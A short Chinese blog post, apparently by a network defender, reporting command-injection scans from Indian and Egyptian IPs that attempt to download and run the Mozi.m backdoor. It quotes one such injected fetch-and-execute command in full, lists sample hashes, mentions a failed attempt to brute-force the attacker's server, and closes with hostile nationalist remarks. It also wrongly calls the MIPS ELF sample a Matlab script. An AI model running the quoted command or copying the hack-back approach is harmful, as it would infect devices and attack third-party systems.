从本次HW开始,就发现大量印度-埃及等外国地址
其中更以印度最为嚣张多以命令注入方式进行漏洞探测
试图远程写入后门Mozi.m
后门我下载后经过微步的威胁分析平台分析后确认为后门
常见的有155段177段为主的探测类IP 以及27段5段开头的后门下载地址
也曾尝试反制但是爆破下载服务器无果后便放弃了
很希望大家可以团结一致抵御外敌 针对于印度的脚本下载服务器以及扫描的IP地址 可以添加我好友 共享
常见印度漏扫请求“weget http://59.177.37.136:56975/Mozi.m -O /tmp/netgear;sh”
初步分析 Mozi.m是使用Matlab函数封装的脚本文件
基本信息(微步威胁分析)
样本名称
c672798dca67f796972b42ad0c89e25d589d2e70eb41892d26adbb6a79f63887-1600259464
样本类型
ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
样本大小
132860
MD5
dbc520ea1518748fec9fcfcf29755c30
SHA1
0a427f86b4360fb603c6e3c5878c9be7ced59adc
SHA256
c672798dca67f796972b42ad0c89e25d589d2e70eb41892d26adbb6a79f63887
SSDeep
3072:Nc4i0agsmw3Py5CP5HM8EVLUuYtgB5H6oz:Nc/0aNPy54EVAhOae
总结 印度贼子亡我华夏之心不死
有想要分析的可以公众号留言我看见了我就发给你 看不见就自己去下载一个
安全之路长漫漫 愿天下0day出国外
世界和平
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论